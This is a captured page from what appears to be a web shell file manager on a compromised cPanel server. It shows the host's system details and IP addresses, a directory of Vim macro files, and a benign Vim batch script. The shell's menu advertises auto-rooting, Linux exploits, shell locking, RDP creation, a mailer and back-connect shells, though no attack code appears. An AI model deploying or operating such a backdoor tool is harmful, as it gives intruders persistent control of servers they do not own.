Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.69.6.212
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
vim /
vim82 /
macros /
[ HOME SHELL ]
Name
Size
Permission
Action
hanoi
[ DIR ]
drwxr-xr-x
life
[ DIR ]
drwxr-xr-x
maze
[ DIR ]
drwxr-xr-x
urm
[ DIR ]
drwxr-xr-x
editexisting.vim
124
B
-rw-r--r--
justify.vim
109
B
-rw-r--r--
less.bat
288
B
-rw-r--r--
less.sh
588
B
-rwxr-xr-x
less.vim
5.61
KB
-rw-r--r--
matchit.vim
124
B
-rw-r--r--
shellmenu.vim
115
B
-rw-r--r--
swapmous.vim
114
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : less.bat
@echo off rem batch file to start Vim with less.vim. rem Read stdin if no arguments were given. rem Written by Ken Takata. if "%1"=="" ( vim --cmd "let no_plugin_maps = 1" -c "runtime! macros/less.vim" - ) else ( vim --cmd "let no_plugin_maps = 1" -c "runtime! macros/less.vim" %* )
Close